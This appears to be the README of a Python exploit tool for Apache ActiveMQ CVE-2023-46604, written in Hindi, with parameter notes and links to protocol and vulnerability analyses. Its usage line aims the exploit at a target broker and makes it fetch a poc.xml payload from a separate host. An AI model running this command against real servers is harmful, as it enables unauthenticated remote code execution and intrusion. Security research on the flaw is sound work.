
# Apache ActiveMQ CVE-2023-46604 के लिए Python-आधारित रिमोट कोड निष्पादन शोषण यह OpenWire प्रोटोकॉल का उपयोग करके अनधिकृत RCE के लिए XML पेलोड वितरित करता है।
यह प्रोजेक्ट https://github.com/X1r0z/ActiveMQ-RCE प्रोजेक्ट के exp को संदर्भित करके पुनः लिखा गया एक python संस्करण का exp है।
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616
जहाँ -p पैरामीटर डिफ़ॉल्ट रूप से activeMQ का डिफ़ॉल्ट पोर्ट है। -x पैरामीटर के साथ प्रोटोकॉल प्रीफ़िक्स जोड़ना सुनिश्चित करें।
यहाँ openwire प्रोटोकॉल का आरेख संलग्न है, जिससे यह स्पष्ट हो जाता है।
नीचे प्रकार का डेटा पैकेट प्रारूप दिया गया है।
Throwable
विशिष्ट भेद्यता विश्लेषण नीचे दिए गए संदर्भ लेखों में देखें।
# openwire प्रोटोकॉल का विश्लेषण
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# CVE भेद्यता सिद्धांत का विश्लेषण
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/